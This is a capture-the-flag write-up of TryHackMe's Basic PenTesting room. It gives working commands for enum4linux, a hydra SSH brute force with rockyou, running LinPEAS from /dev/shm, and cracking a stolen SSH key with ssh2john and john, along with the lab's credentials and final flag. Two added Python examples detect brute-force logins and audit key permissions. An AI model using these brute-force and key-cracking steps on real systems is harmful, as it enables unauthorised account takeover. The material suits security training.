Basic PenTesting TryHackMe

performed by: jb-williams

Summary

  • Hidden directory on the web server (/development, found via DirBuster and rockyou).

  • Usernames (jan and kay, found via enum4linux).

  • Password (jan:armando, found via hydra against SSH).

  • Private SSH key found with LinPEAS.

  • Cracked the SSH key's passphrase.

  • Was able to log in as kay and read pass.bak.

User  Pass     Service  SSH Key     IP            Port
jan   armando  ssh      -           10.10.62.206  22
kay   beeswax  ssh      kay_id_rsa  10.10.62.206  22

Port  Service
22    SSH 7.2
80    Apache 2.4.18
139   SMB 3.X - 4.X
445   SMB 4.3.11
8009  Apache JServ 1.3
8080  Apache Tomcat 9.0.7

Scanning & Enumeration

  • Scanned the machine on the network:

IP: 10.10.62.206

  • Discovered these ports and services running on the device:

Port  Service
22    SSH 7.2
80    Apache 2.4.18
139   SMB 3.X - 4.X
445   SMB 4.3.11
8009  Apache JServ 1.3
8080  Apache Tomcat 9.0.7
  • Began enumeration of the web page on port 80 with DirBuster.

  • Discovered:

/development/*

/development/dev.txt

/development/j.txt

  • /development/dev.txt talks about Apache Struts 2.5.12 and contains the initials of what I assume are two employees:

    • Found initials: -K and -J

  • /development/j.txt contains a message from K telling J that J's password is weak and can be cracked easily.

Brute Forcing

  • Ran enum4linux against the target IP, splitting the output between STDOUT and a log file:

enum4linux -a 10.10.62.206 | tee -a enum4linux.log

  • enum4linux found the full usernames Kay and Jan.

  • Brute-forced SSH to find Jan's password:

hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://10.10.62.206

  • Credentials that were found:

User  Pass     Service  IP            Port
jan   armando  ssh      10.10.62.206  22

  • Verified the login credentials.
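From the defender's side, the hydra run above leaves a very recognisable trace in the target's /var/log/auth.log: a burst of "Failed password" lines from one source address, often followed by an "Accepted password" line from the same address once the wordlist hits. The following is an added example, not part of the original writeup or of any tool it mentions. It parses constructed sshd log lines (the addresses, PIDs and timestamps are made up), flags any source IP with five or more failures inside a 60-second window, and reports which accounts that IP then logged into successfully, since that is the case that needs an immediate response rather than a ticket. The year is assumed to be 2024 because syslog timestamps carry none.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample of the sshd lines that land in /var/log/auth.log on the target.
# The burst from 10.10.14.5 is what a wordlist attack on one account looks like; the
# single failure from 192.168.1.20 is ordinary user error and must not raise an alert.
SAMPLE_AUTH_LOG = """\
Mar  3 10:01:01 target sshd[1201]: Failed password for jan from 10.10.14.5 port 50110 ssh2
Mar  3 10:01:02 target sshd[1202]: Failed password for jan from 10.10.14.5 port 50111 ssh2
Mar  3 10:01:02 target sshd[1203]: Failed password for jan from 10.10.14.5 port 50112 ssh2
Mar  3 10:01:03 target sshd[1204]: Failed password for jan from 10.10.14.5 port 50113 ssh2
Mar  3 10:01:03 target sshd[1205]: Failed password for invalid user admin from 10.10.14.5 port 50114 ssh2
Mar  3 10:01:04 target sshd[1206]: Accepted password for jan from 10.10.14.5 port 50115 ssh2
Mar  3 10:05:00 target sshd[1300]: Failed password for kay from 192.168.1.20 port 41000 ssh2
Mar  3 10:40:00 target sshd[1400]: Accepted publickey for kay from 192.168.1.20 port 41001 ssh2
Mar  3 10:41:00 target sshd[1401]: pam_unix(sshd:session): session opened for user kay by (uid=0)
"""

# Matches both "Failed"/"Accepted" outcomes and both password and publickey methods;
# "invalid user" is the prefix sshd adds when the account does not exist.
LINE_RE = re.compile(
    r"^(?P<month>\w{3})\s+(?P<day>\d+) (?P<time>\d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>password|publickey) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\S+) port \d+ ssh2$"
)


def parse_auth_log(text, year=2024):
    """Turn sshd auth lines into event dicts; lines that are not login outcomes are skipped.
    `year` is an assumption: syslog timestamps do not include one."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        when = datetime.strptime(
            f"{m['month']} {m['day']} {m['time']} {year}", "%b %d %H:%M:%S %Y"
        )
        events.append({
            "time": when,
            "result": m["result"],
            "method": m["method"],
            "user": m["user"],
            "ip": m["ip"],
        })
    return events


def find_bruteforce(events, threshold=5, window_seconds=60):
    """Return one alert per source IP that produced `threshold` or more failures within any
    `window_seconds`-long window. An alert also lists accounts that IP logged into after
    the burst began, which is the signature of a successful password guess."""
    failures = defaultdict(list)   # ip -> [(time, user), ...]
    successes = defaultdict(list)  # ip -> [(time, user), ...]
    for ev in events:
        bucket = failures if ev["result"] == "Failed" else successes
        bucket[ev["ip"]].append((ev["time"], ev["user"]))

    alerts = []
    for ip, fails in failures.items():
        fails.sort()
        burst_start = None
        j = 0
        for i, (t, _user) in enumerate(fails):
            # Slide the window's left edge forward until it spans at most window_seconds.
            while (t - fails[j][0]).total_seconds() > window_seconds:
                j += 1
            if i - j + 1 >= threshold:
                burst_start = fails[j][0]
                break
        if burst_start is None:
            continue
        compromised = sorted({u for t, u in successes.get(ip, []) if t >= burst_start})
        alerts.append({
            "ip": ip,
            "failures": len(fails),
            "targeted_users": sorted({u for _, u in fails}),
            "first_failure": fails[0][0],
            "last_failure": fails[-1][0],
            "compromised_users": compromised,
        })
    return alerts


if __name__ == "__main__":
    for alert in find_bruteforce(parse_auth_log(SAMPLE_AUTH_LOG)):
        severity = "CRITICAL" if alert["compromised_users"] else "WARNING"
        print(f"[{severity}] {alert['ip']}: {alert['failures']} failures against "
              f"{alert['targeted_users']}, logged in as {alert['compromised_users']}")
```

The threshold and window are deliberately loose; a tool like hydra produces far more than five failures a minute, so tuning them tighter trades a little recall for fewer false alarms from users mistyping passwords. On a real host the same logic belongs in fail2ban or the SIEM, where the response can be a temporary block rather than a printout.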

Internal Enumeration

  • Logged into jan’s account through ssh.

  • I was able to traverse to /home/kay and saw that there was a pass.bak file there.

  • However, I was unable to read anything in /home/kay.

  • From my host, I used scp to transfer LinPEAS to the machine's shared-memory directory, then logged back in and ran it from there:

scp /opt/linpeas/linpeas.sh jan@10.10.62.206:/dev/shm

ssh jan@10.10.62.206

cd /dev/shm && chmod +x linpeas.sh && ./linpeas.sh | tee linlog.txt
  • This enumeration led me to Kay's private SSH key, which the jan account was able to read:

/home/kay/.ssh/id_rsa

  • I copied it to my host as kay_id_rsa and restricted its permissions:

chmod 600 kay_id_rsa

  • Discovered the SSH key was passphrase-protected, so I converted it with ssh2john, wrote the output to a text file, and ran john on it:

python3 /usr/share/john/ssh2john.py kay_id_rsa > forjohn.txt

john forjohn.txt
  • John found kay's password: beeswax

  • SSH'd into the machine as Kay, entering the passphrase beeswax when prompted:

ssh -i kay_id_rsa kay@10.10.62.206

User  Pass     Service  SSH Key     IP            Port
kay   beeswax  ssh      kay_id_rsa  10.10.62.206  22
  • As Kay I was able to read that pass.bak file:
cat pass.bak
  • With that I was able to find the Password/Last Flag:
heresareallystrongpasswordthatfollowsthepasswordpolicy$$
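The step that turned a low-privileged jan shell into Kay's account was nothing more than a private key sitting in /home/kay/.ssh with permissions that let another local user read it; a strong passphrase would have made the copied key useless, and correct file modes would have stopped the copy in the first place. The following is an added example, not part of the original writeup or of LinPEAS. It is the check a sysadmin would run on /home to catch that misconfiguration before an attacker does: it walks every home directory, finds files whose content is a PEM or OpenSSH private key, and reports any key or .ssh directory that grants group or other any permission. To run offline it builds a constructed /home layout in a temporary directory (user names are taken from the writeup; the key bodies are fake) in which jan's key is locked down and kay's is not.

```python
import stat
import tempfile
from pathlib import Path

SSH_DIR_ISSUE = "~/.ssh accessible to group/other (should be 0700)"
KEY_ISSUE = "private key readable by group/other (should be 0600)"


def looks_like_private_key(path: Path) -> bool:
    """Content check rather than a name check: both PEM ("BEGIN RSA PRIVATE KEY") and
    OpenSSH ("BEGIN OPENSSH PRIVATE KEY") formats start with this banner, while the
    matching .pub files start with the key type and are meant to be shared."""
    try:
        with path.open("rb") as fh:
            head = fh.read(64)
    except OSError:
        return False
    return head.startswith(b"-----BEGIN") and b"PRIVATE KEY-----" in head


def audit_home_dirs(root: Path):
    """Return (path relative to root, octal mode, issue) for every ~/.ssh directory or
    private key that grants any permission to group or other. `root` plays the role of /home."""
    findings = []
    for home in sorted(p for p in root.iterdir() if p.is_dir()):
        ssh_dir = home / ".ssh"
        if not ssh_dir.is_dir():
            continue
        mode = stat.S_IMODE(ssh_dir.stat().st_mode)
        if mode & 0o077:
            findings.append((str(ssh_dir.relative_to(root)), f"{mode:04o}", SSH_DIR_ISSUE))
        for entry in sorted(ssh_dir.iterdir()):
            if not entry.is_file() or not looks_like_private_key(entry):
                continue
            mode = stat.S_IMODE(entry.stat().st_mode)
            if mode & 0o077:
                findings.append((str(entry.relative_to(root)), f"{mode:04o}", KEY_ISSUE))
    return findings


# Constructed placeholder; not a real key.
FAKE_KEY = b"-----BEGIN OPENSSH PRIVATE KEY-----\nnot-a-real-key\n-----END OPENSSH PRIVATE KEY-----\n"


def build_fixture(root: Path) -> None:
    """Constructed /home layout mirroring the writeup's finding: jan's key is locked
    down, kay's .ssh directory and id_rsa are readable by every local user."""
    jan_ssh = root / "jan" / ".ssh"
    jan_ssh.mkdir(parents=True)
    jan_ssh.chmod(0o700)
    (jan_ssh / "id_rsa").write_bytes(FAKE_KEY)
    (jan_ssh / "id_rsa").chmod(0o600)

    kay_ssh = root / "kay" / ".ssh"
    kay_ssh.mkdir(parents=True)
    kay_ssh.chmod(0o755)
    (kay_ssh / "id_rsa").write_bytes(FAKE_KEY)
    (kay_ssh / "id_rsa").chmod(0o644)
    # The public half is supposed to be world-readable and must not be reported.
    (kay_ssh / "id_rsa.pub").write_text("ssh-ed25519 AAAAC3NotARealKey kay@target\n")
    (kay_ssh / "id_rsa.pub").chmod(0o644)


def demo():
    """Build the fixture in a temporary directory, audit it, and return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        build_fixture(root)
        return audit_home_dirs(root)


if __name__ == "__main__":
    for path, mode, issue in demo():
        print(f"{path}  {mode}  {issue}")
```

Pointing audit_home_dirs at the real /home (run as root so every directory is readable) gives the same report for a live host; fixing a finding is `chmod 700 ~/.ssh` and `chmod 600` on the key, and rotating any key that was exposed, since a copy may already exist elsewhere. The mode check is intentionally strict (any group/other bit at all) because sshd itself refuses keys with looser modes on the client side, so there is no legitimate reason for them.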

written and performed by jb-williams - github